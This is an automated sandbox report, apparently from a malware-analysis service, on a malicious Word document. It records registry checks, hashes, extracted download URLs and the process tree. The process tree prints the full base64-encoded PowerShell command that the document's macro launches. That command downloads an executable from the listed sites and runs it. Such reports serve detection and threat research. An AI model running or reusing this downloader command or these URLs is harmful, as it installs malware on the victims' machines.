Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
13/06/2024, 13:35
Behavioral task
behavioral1
Sample
a5d076e196edd1e2271ff2bc178cc6c0_JaffaCakes118.doc
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
a5d076e196edd1e2271ff2bc178cc6c0_JaffaCakes118.doc
Resource
win10v2004-20240611-en
General
-
Target
a5d076e196edd1e2271ff2bc178cc6c0_JaffaCakes118.doc
-
Size
96KB
-
MD5
a5d076e196edd1e2271ff2bc178cc6c0
-
SHA1
e2b3a98bb2844865890bf7133621acc11c485c33
-
SHA256
c938e12aa898228c05c7f6257ebea9c6b22b9d842573043edef70cc5e2ef21ac
-
SHA512
5b0dd7d0db62956323717d4f345a0e3400fddf5043af816073d83a77fe68a40041b3a78530e28233c586ed17594f805431c2bd062a1c779d3e6d91251ed78529
-
SSDEEP
1536:VDMeOY5C6OJsdBpZWa+a9KQJJIJOO3qBYxyQiVz9wRQWR:V4eOY5CTsdAqIgUqyxyQiVRwGWR
Malware Config
Extracted
https://sandraadamson.com/wp-admin/eb4hsq5634/
http://qureshijewellery.com/css/ly399/
http://acbay.com/uploaded/i63tw3769/
http://steponmephoto.com/thewahligfour/x64157/
http://sociallysavvyseo.com/PinnacleDynamicServices/of18k67/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4628 2332 powErSHell.exe 83 -
Blocklisted process makes network request 5 IoCs
flow pid Process 15 4628 powErSHell.exe 20 4628 powErSHell.exe 22 4628 powErSHell.exe 23 4628 powErSHell.exe 26 4628 powErSHell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2280 WINWORD.EXE 2280 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4628 powErSHell.exe 4628 powErSHell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4628 powErSHell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2280 WINWORD.EXE 2280 WINWORD.EXE 2280 WINWORD.EXE 2280 WINWORD.EXE 2280 WINWORD.EXE 2280 WINWORD.EXE 2280 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a5d076e196edd1e2271ff2bc178cc6c0_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exepowErSHell -e JABwADkAMAA4ADYAOAA9ACcAbAA5ADYAMgAyADgAOQAnADsAJABYAF8AOQAxADIANwA2ADkAIAA9ACAAJwA3ADUANAAnADsAJAB6ADkANQAzADUAOAA9ACcAdgA1ADQANQA2ADgAMwA4ACcAOwAkAFEAOAA3ADQAOAAyAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABYAF8AOQAxADIANwA2ADkAKwAnAC4AZQB4AGUAJwA7ACQATQA3ADIAXwA0ADIAPQAnAFkANAA5ADEAMwA1AF8AJwA7ACQAdwA0ADIANwA5ADAAXwA4AD0AJgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABOAEUAVAAuAHcAYABlAEIAYwBgAGwAaQBgAGUAbgBUADsAJABIADUANgA4ADYAOAA9ACcAaAB0AHQAcABzADoALwAvAHMAYQBuAGQAcgBhAGEAZABhAG0AcwBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGUAYgA0AGgAcwBxADUANgAzADQALwBAAGgAdAB0AHAAOgAvAC8AcQB1AHIAZQBzAGgAaQBqAGUAdwBlAGwAbABlAHIAeQAuAGMAbwBtAC8AYwBzAHMALwBsAHkAMwA5ADkALwBAAGgAdAB0AHAAOgAvAC8AYQBjAGIAYQB5AC4AYwBvAG0ALwB1AHAAbABvAGEAZABlAGQALwBpADYAMwB0AHcAMwA3ADYAOQAvAEAAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAG8AbgBtAGUAcABoAG8AdABvAC4AYwBvAG0ALwB0AGgAZQB3AGEAaABsAGkAZwBmAG8AdQByAC8AeAA2ADQAMQA1ADcALwBAAGgAdAB0AHAAOgAvAC8AcwBvAGMAaQBhAGwAbAB5AHMAYQB2AHYAeQBzAGUAbwAuAGMAbwBtAC8AUABpAG4AbgBhAGMAbABlAEQAeQBuAGEAbQBpAGMAUwBlAHIAdgBpAGMAZQBzAC8AbwBmADEAOABrADYANwAvACcALgBzAFAAbABJAFQAKAAnAEAAJwApADsAJABHADAANgA1ADIAOAAwADkAPQAnAFMAMwAwAF8ANgA2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAF8AXwA1ADIAXwBfACAAaQBuACAAJABIADUANgA4ADYAOAApAHsAdAByAHkAewAkAHcANAAyADcAOQAwAF8AOAAuAEQAbwBXAE4ATABPAGEARABGAEkAbABlACgAJABaAF8AXwA1ADIAXwBfACwAIAAkAFEAOAA3ADQAOAAyACkAOwAkAEMAMAAxADUANAAwADEAPQAnAHUAOQAyAF8ANQAxAF8AMgAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFEAOAA3ADQAOAAyACkALgBsAEUATgBHAHQASAAgAC0AZwBlACAAMwA2ADEANgA5ACkAIAB7ACYAKAAnAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAFEAOAA3ADQAOAAyADsAJABGAF8ANAAzADkAXwAxADIAPQAnAE8ANwA4ADAAMAA3ADkAJwA7AGIAcgBlAGEAawA7ACQAaQA1ADAAMABfAF8ANQA9ACcASAAwADAAOAAwADkANQAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGYANAAwADAANwA1ADcAMwA9ACcAaQA2ADIANQAzAF8AJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4628
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
58KB
MD5a9043c10636de2d530476940d9f066d5
SHA1cae2c73bf0aa42dcc08114f116781425431a3d13
SHA25681153269dbc74ed5eb4a1c6a6b25ba5fd4194144e54c8fe1f9a5d5adf17dfbc4
SHA5128a4e45aabcdce0bd2d97956b1ea5e416f194554a6f22c5d8e5864f1868b130c7bbb6fdce6bd5c2977bbab19c1d60a6252dcbe95f7a3036e7cb83b931690cf915
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82